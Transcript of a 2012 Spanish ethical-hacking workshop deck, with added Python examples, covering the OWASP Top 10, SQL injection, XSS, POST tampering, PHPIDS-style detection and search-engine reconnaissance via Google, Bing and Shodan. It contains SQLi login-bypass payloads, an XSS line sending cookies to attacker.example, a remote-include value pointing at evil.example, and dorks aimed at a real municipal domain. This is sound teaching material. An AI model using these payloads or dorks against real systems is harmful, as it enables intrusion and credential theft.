Taller Hacking Ético #Sysmana2012

90,056 views

Representatives of the Córdoba-based company "Proxy Consulting" (Miguel Ángel Arroyo and Carlos García) give us an instructive and very interesting workshop on ethical hacking.

IES Gran Capitán. Sysmana04.

Published in: Technology
Taller Hacking Ético #Sysmana2012

  1. Miguel Á. Arroyo Moreno, Carlos García García. @PxyConsulting @ciyinet www.proxyconsulting.es
  2. Contents: Presentation; Web Ethical Hacking; External Ethical Hacking
  3. Presentation: Córdoba-based consultancy specialising in information security, since 2006. www.proxyconsulting.es. Blog: www.hacking-etico.com
  4. Some of our services: External Ethical Hacking; Perimeter Security; Web Ethical Hacking; Aula Segura (Secure Classroom); Oficina Segura (Secure Office)
  5. Carlos García García @ciyinet
  6. Contents – Web Ethical Hacking: OWASP (OWASP Top 10). Attack demonstrations: SQL injection; Cross-Site Scripting; manipulation of HTTP headers and POST data; credential theft*. Secure web application: secure programming; WAF.
  7. OWASP: Open Web Application Security Project (2001). Its goal is to identify and fight the causes that make software insecure. Foundation (2004) / community. Documents and tools. www.owasp.org
  8. OWASP Top 10: "The ten most important risks in web applications". An educational document. For each risk: a description; an example scenario; how to check whether our application is vulnerable; recommendations to prevent it. Free.
  9. [image]
  10. OWASP Top 10 [image]
  11. OWASP Top 10 [image]
  12. Attack demonstrations: SQLi, XSS, manipulation of HTTP data, credential theft*
  13. SQL injection: malicious commands are included in the data an application sends to an interpreter. The interpreter takes that data and executes it as valid SQL code. Severe impact: loss or corruption of data; denial of access; complete takeover of the server.
  14. SQL injection. The vulnerable login query, built in PHP by concatenating the form fields into the SQL text:
      "SELECT * FROM usuario WHERE email='".$_POST['log']."' AND password='".$_POST['pwd']."'";
  15. With legitimate input the query becomes:
      "SELECT * FROM usuario WHERE email='i52gagac@uco.es' AND password='password'";
  16.–17. Attacker input. User: ' OR '1'='1   Password: ' OR '1'='1
  18. The input is concatenated verbatim, so the attacker's quote closes the string literal and the rest is parsed as SQL:
      "SELECT * FROM usuario WHERE email='" . "' OR '1'='1" . "' AND password='" . "' OR '1'='1" . "'";
  19. Resulting query:
      "SELECT * FROM usuario WHERE email='' OR '1'='1' AND password='' OR '1'='1'";
      A syntactically correct statement whose WHERE clause is always true: the first user row is returned and the login succeeds without a valid password.
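The login bypass from slides 14–19 carried through end to end, as an added example that is not part of the workshop's material. It uses Python with an in-memory SQLite table (the slides' `usuario` table; the user rows are constructed here) and shows the concatenated query beside the parameterised one; the account names, passwords and the second "targeted" payload are assumptions for the demo.

```python
import sqlite3

# Constructed demo data, not the workshop's database. Plaintext passwords are
# kept only to mirror the slide; a real application stores password hashes.
USERS = [("i52gagac@uco.es", "password"), ("admin@example.com", "s3cret")]


def build_db() -> sqlite3.Connection:
    """In-memory SQLite database with the 'usuario' table from the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usuario (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO usuario (email, password) VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, log: str, pwd: str):
    """Builds the query by string concatenation, exactly like the PHP on slide 14.
    Returns the matched row (id, email, password) or None."""
    query = ("SELECT * FROM usuario WHERE email='" + log +
             "' AND password='" + pwd + "'")
    return conn.execute(query).fetchone()


def login_safe(conn: sqlite3.Connection, log: str, pwd: str):
    """Same lookup with bound parameters: the driver sends the values separately
    from the SQL text, so quotes in the input can never change the statement."""
    query = "SELECT * FROM usuario WHERE email=? AND password=?"
    return conn.execute(query, (log, pwd)).fetchone()


# Two attacker inputs: the slide's always-true payload, and a targeted one that
# picks a specific account and comments out the password check ("-- " starts a
# comment in both SQLite and MySQL; MySQL needs the trailing space).
PAYLOAD_ALWAYS_TRUE = "' OR '1'='1"
PAYLOAD_TARGETED = "admin@example.com' -- "


def demo() -> dict:
    """Runs both payloads against both implementations and returns the rows."""
    conn = build_db()
    return {
        "vuln_always_true": login_vulnerable(conn, PAYLOAD_ALWAYS_TRUE, PAYLOAD_ALWAYS_TRUE),
        "vuln_targeted": login_vulnerable(conn, PAYLOAD_TARGETED, "wrong"),
        "safe_always_true": login_safe(conn, PAYLOAD_ALWAYS_TRUE, PAYLOAD_ALWAYS_TRUE),
        "safe_legit": login_safe(conn, "i52gagac@uco.es", "password"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:18s} -> {row}")
```

With the concatenated query the always-true payload logs in as whichever row the database returns first, and the targeted payload logs in as `admin@example.com` with any password; the parameterised query returns nothing for either and still works for real credentials. Escaping quotes by hand (the old `addslashes`/`mysql_real_escape_string` approach) is weaker than binding because it depends on the connection's character set and on every call site remembering to do it.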
  20. Cross-Site Scripting (XSS): unvalidated data supplied by an attacker is sent to a victim's browser. That data may be stored in a database (stored XSS) or reflected back from a web input (reflected XSS). Moderate impact: session hijacking; theft of sensitive data; redirecting the user to a malware or phishing site.
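A stored-XSS comment rendered two ways, as an added example not taken from the workshop. The comment and link values are constructed attacker inputs; `html.escape` from the standard library does the output encoding. The link case goes one step beyond the slide: inside an `href` attribute, encoding alone is not enough, because a `javascript:` URL contains no characters that need escaping, so the scheme has to be allow-listed as well.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed attacker inputs: a stored comment that leaks the session cookie,
# and a profile link using the javascript: scheme (HTML escaping does not stop it).
EVIL_COMMENT = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
EVIL_LINK = "JavaScript:alert(document.cookie)"


def render_comment_vulnerable(comment: str) -> str:
    """Copies the stored value straight into the page (stored XSS)."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """Encodes for HTML text context: <, >, &, and quotes become entities."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def safe_href(url: str) -> str:
    """Attribute context needs more than escaping: only http(s) links are allowed.
    Browsers ignore ASCII control characters inside the scheme, so they are
    stripped before parsing; anything else collapses to a harmless '#'."""
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    if urlsplit(cleaned).scheme not in ("http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def render_link(url: str, text: str) -> str:
    """Link with the URL allow-listed and the visible text HTML-encoded."""
    return f'<a href="{safe_href(url)}">{html.escape(text)}</a>'


def has_active_content(fragment: str) -> bool:
    """Crude check used only to contrast the two renderings; not a filter."""
    return bool(re.search(r"<script|javascript:", fragment, re.I))


if __name__ == "__main__":
    print(render_comment_vulnerable(EVIL_COMMENT))
    print(render_comment_safe(EVIL_COMMENT))
    print(render_link(EVIL_LINK, "my profile"))
```

Output encoding must match the context the data lands in (HTML text, attribute, URL, JavaScript string); ESAPI's encoder, mentioned later in the deck, exists precisely to provide one function per context. Marking the session cookie `HttpOnly` limits what a successful injection can steal, but does not prevent the injection.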
  21. Manipulation of HTTP headers and POST data: test the application by modifying POST parameters (and headers, cookies and hidden fields) before they reach the server. The underlying flaw is validation performed on the client side instead of the server side; everything the browser sends is under the attacker's control and can be edited in an intercepting proxy.
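A checkout handler that trusts a posted price, beside one that re-derives it on the server, as an added example that is not from the workshop. The catalogue, the tampered form submissions and the quantity limit are all constructed for the demo; the point is that a JavaScript check on the page never runs for a request sent from a proxy or from curl.

```python
# Constructed catalogue; the authoritative price lives here, never in the form.
CATALOG = {"sku-100": 49.90, "sku-200": 120.00}
MAX_QTY = 100  # assumed business limit


def checkout_vulnerable(form: dict) -> float:
    """Trusts the hidden 'price' field and the 'qty' field exactly as posted.
    The page's JavaScript may have validated them, but the attacker edited the
    request after the browser, so that validation never happened."""
    return round(float(form["price"]) * int(form["qty"]), 2)


def checkout_safe(form: dict) -> float:
    """Re-derives every trusted value server-side and range-checks the rest.
    The posted 'price' is simply ignored."""
    sku = form.get("sku")
    if sku not in CATALOG:
        raise ValueError("unknown product")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise ValueError("quantity is not an integer") from None
    if not 1 <= qty <= MAX_QTY:
        raise ValueError("quantity out of range")
    return round(CATALOG[sku] * qty, 2)


# Constructed tampered submissions: a rewritten hidden price field, and a
# negative quantity that turns a purchase into a refund.
TAMPERED_PRICE = {"sku": "sku-200", "price": "0.01", "qty": "1"}
NEGATIVE_QTY = {"sku": "sku-100", "price": "49.90", "qty": "-3"}

if __name__ == "__main__":
    for label, form in (("tampered price", TAMPERED_PRICE), ("negative qty", NEGATIVE_QTY)):
        print(label, "vulnerable ->", checkout_vulnerable(form))
        try:
            print(label, "safe ->", checkout_safe(form))
        except ValueError as exc:
            print(label, "safe -> rejected:", exc)
```

The same rule applies to any value the client is not entitled to set: user IDs, roles, discount codes, file paths. Validate type, range and authorisation on the server, and treat client-side checks as a usability feature only.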
  22. Secure web application: security must be present in every phase of the project. Secure design and programming. Security audit. WAF.
  23. Secure programming. Good practices when coding: follow the OWASP Top 10; sanitise user input before using it (OWASP Enterprise Security API; OWASP AntiSamy Project); least privilege for database connections (the web application's account should not be able to drop tables or read other schemas); validate direct object references, i.e. check that the caller is authorised for the record it names, not only that the ID is well formed.
  24. OWASP Enterprise Security API: an API of objects and methods that provide efficient validation and security controls, to avoid common vulnerabilities. Versions for most web programming languages: ASP.NET, Java, PHP, ColdFusion, JavaScript, Ruby, Python, etc.
  25. OWASP Enterprise Security API [image]
  26. ESAPI – validation and encoding handling [image]
  27. WAF. Input -> server-side code. Sanitising every input is costly. modSecurity: a plugin for the web server; only available for Apache (true at the time of the talk; it has since been ported to IIS and nginx). PHPIDS: an IDS for PHP applications; rule-based; leaves you free to decide how to react.
  28. PHPIDS. Using a web IDS: PHPIDS. Requests pass through PHPIDS: SESSION, POST, GET, COOKIE. Detects XSS, SQLi, RFE, LFI, DoS, LDAP injection, etc. Proposed measures: if a threat level is present, redirect to a warning page; if there is no threat, continue the PHP script. Demonstration.
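The request-inspection loop from slide 28, written out as an added example; it is not PHPIDS's own code and the rule set, weights and threshold are hypothetical ones chosen for this demo. Each parameter from every source (GET, POST, COOKIE, SESSION) is URL-decoded once and matched against every rule, the impact is the sum of the weights of the rules that fired, and the decision follows the slide's policy: redirect when a threat level is present, otherwise continue.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical rule set written for this example; it is not PHPIDS's filter file.
# (tag, pattern, impact weight)
RULES = [
    ("xss",  re.compile(r"<\s*script|javascript\s*:|\bon\w+\s*=", re.I), 5),
    ("sqli", re.compile(r"['\"]\s*(or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+|union\s+select|--\s*$", re.I), 5),
    ("lfi",  re.compile(r"\.\./|/etc/passwd|php://", re.I), 4),
    ("rfi",  re.compile(r"^\s*(https?|ftp)://", re.I), 3),
]
THRESHOLD = 3  # assumed policy: any single matching rule is enough to redirect


def analyse_request(request: dict) -> tuple:
    """request maps a source ('GET', 'POST', 'COOKIE', 'SESSION') to its
    parameters. Returns (impact, findings) where findings lists
    (source, parameter, rule tag) for every rule that fired."""
    impact, findings = 0, []
    for source, params in request.items():
        for name, value in params.items():
            decoded = unquote_plus(str(value))  # one level of URL decoding
            for tag, pattern, weight in RULES:
                if pattern.search(decoded):
                    impact += weight
                    findings.append((source, name, tag))
    return impact, findings


def decide(request: dict) -> tuple:
    """Slide 28's policy: threat level present -> redirect to the warning page,
    otherwise let the PHP script continue. Returns (action, impact, findings)."""
    impact, findings = analyse_request(request)
    action = "redirect" if impact >= THRESHOLD else "continue"
    return action, impact, findings


# Constructed requests for the demo.
REQUESTS = {
    "benign": {"GET": {"q": "phpmyadmin welcome"},
               "POST": {"log": "i52gagac@uco.es", "pwd": "password"}},
    "sqli": {"POST": {"log": "' OR '1'='1", "pwd": "' OR '1'='1"}},
    "xss_encoded": {"GET": {"name": "%3Cscript%3Ealert(1)%3C%2Fscript%3E"}},
    "lfi": {"GET": {"page": "../../etc/passwd"}},
    "rfi": {"GET": {"page": "http://evil.example/shell.txt"}},
}

if __name__ == "__main__":
    for label, req in REQUESTS.items():
        action, impact, findings = decide(req)
        print(f"{label:12s} impact={impact:2d} -> {action:8s} {findings}")
```

Pattern matching of this kind is a second line of defence, not a replacement for parameterised queries and output encoding: a blacklist can be evaded (SQL comments inside keywords, double URL encoding, alternative event handlers) and produces false positives on legitimate input containing quotes or angle brackets. PHPIDS normalises the input before matching for exactly this reason, and the slide's "freedom to decide" matters in practice: logging with a threshold tuned on real traffic is usually a better first step than blocking.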
  29. Miguel Á. Arroyo Moreno @PxyConsulting
  30. Contents – External Ethical Hacking: Ethical Hacking; Search Engine Hacking (Google Hacking, Bing Hacking, Shodan Hacking); Metasploit & Metasploitable
  31. Contents: Search engines as a tool for pentesters (email addresses; files and folders with sensitive information; metadata (FOCA online); usernames and passwords). Search Engine Hacking: Google, Bing, Shodan.
  32. Search engines as a tool: very useful in the information-gathering phase. It is a passive and minimally intrusive process. Passive because there is no direct communication with the target (cached versions can be used). Minimally intrusive because the search itself has no direct consequences for the target. We obtain email addresses, files, metadata, usernames and passwords.
  33. SEH with Google: Google indexes everything on the web except what we say we do not "want" indexed, via robots.txt. Powerful search operators that are very useful for ethical hacking. Use cached versions to stay passive. Documentary noise, and how to reduce it.
  34. SEH with Google – robots.txt [image]
  35. SEH with Google – error messages [image]
  36. SEH with Google – MySQL: one of the most common searches is locating MySQL servers through phpMyAdmin. It is quite easy if you know the right key phrases and reduce the documentary noise: "welcome to phpmyadmin" "your mysql server is running" -"not allowed". Countermeasure: prevent indexing of the /phpmyadmin directory with a Disallow clause in our robots.txt. Bear in mind that robots.txt is only a request that well-behaved crawlers honour, and that it is itself a public file listing the paths you want hidden; it should go together with authentication and source-IP restriction on the phpMyAdmin directory, or with not exposing it to the Internet at all. More information at www.hacking-etico.com.
  37. SEH with Bing – email addresses: Bing has operators Google lacks, for example near. It can be very handy for finding email addresses. Search results change when near is used to look for addresses: correo near:3 ayuncordoba.es (the word "correo", mail, within three words of the domain). We get better results.
  38. SEH with Bing – email addresses [image]
  39. SEH with Bing – domains by IP: another very interesting operator is ip, which shows all the domains that point to a given IP address. It can help us find new domains and subdomains pointing to that IP: virtual hosts? With the results we can widen the scope of the audit, after confirming with the client that the new hosts are covered by the engagement. Example with ayuncordoba.es (195.57.42.107): new domains and subdomains appear.
  40. SEH with Bing – domains by IP [image]
  41. SEH with Shodan – resources: a search engine aimed at Internet resources that are not documents: routers, access points, servers, IP cameras... A really interesting tool from the pentester's point of view. Free but limited service; free registration increases the number of results and unlocks filters (net, port, country, city, geo...). Paid option. For example, we can search for devices exposing SNMP.
  42. SEH with Shodan – snmp [image]
  43. SEH with Shodan – geo and IP cameras: Shodan has two very interesting filters, country and city. The latter only works for large cities; with Córdoba, for example, it does not work. But we have the geo filter: we can use Córdoba's coordinates in decimal format to restrict the search to resources in Córdoba, with the filter geo:37.884722,-4.778889. Let us look at an example searching for IP cameras in Córdoba.
  44. SEH with Shodan – geo and IP cameras [image]
  45. Remember: Google is not only for finding documents or websites. There are other search engines, such as Bing, that can give us interesting results Google does not. Shodan lets us find hardware resources such as servers, routers, printers... And use what you have learned here ethically and legally.
  46. References: http://www.slideshare.net/fcerullo/owasp-top10-spanish ; http://www.jtmelton.com/2009/01/03/the-owasp-top-ten-and-esapi/
  47. THANKS. Miguel Á. Arroyo Moreno, Carlos García García. @PxyConsulting @ciyinet